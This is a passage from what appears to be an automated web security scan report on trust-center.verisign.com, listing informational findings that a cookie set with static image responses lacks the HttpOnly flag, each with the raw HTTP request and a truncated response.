GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 374 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....-......8..F.#O.....I.=.2Q.Wu..:...............1Z.\}.*U..B.%K.Bh....Mn....-Q....x.....n..{..n..h}.........................x.....q...4..........................................................[SNIP]...
10.81. https://trust-center.verisign.com/rcm/verisign/images/logo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/logo.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/logo.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 16073 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..=..................................................................................................................................................................................................[SNIP]...
10.82. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/popup_button_left.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 348 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....................................................................................................................................................................................................[SNIP]...
10.83. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/popup_button_right.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 344 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....................................................................................................................................................................................................[SNIP]...
10.84. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/pricebox_bg.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 13169 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.......................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46...[SNIP]...
10.85. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/sm_004276_oo.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 597 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a . .....Bv...!..NETSCAPE2.0.....!.. ....,.... . ......h.i.X.oU...m. ..!.. ....,...... ......y........2.M.Z..!.. ....,...... .....b.x...bS.. .!.. ....,...... ...........s.M. .!.. ....,...... .......[SNIP]...
10.86. https://trust-center.verisign.com/rcm/verisign/images/truste.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/truste.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/truste.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 2232 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89aD.T..........utt..<q.7...?<<..p..<......'#$La+.........TQR..Tfff........+......+."HEFa.1.................1......BQ'..c333..K..B......" }.&_]]..8................+,...6<%...Up.........3..?..E..0....[SNIP]...
10.87. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermArrow.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 71 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.............!.......,.............i.....0...U......t$b.G..c.%..;
10.88. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermBgM.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Content-Length: 956 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......JFIF.....H.H.....C............................................ ..................C....... .. .......................................................'......................................[SNIP]...
10.89. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermWtB.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 978 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a ................................. ............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>...[SNIP]...
10.90. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermWtT.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 997 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a ................................. ............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>...[SNIP]...
10.91. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermWtT.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Content-Length: 876 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......JFIF.....H.H.....C............................................ .....................(............................... ...2......................U..........!"6AGu....123q.........?..Y...x.zWG...[SNIP]...
10.92. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/webtrust.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/webtrust.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; 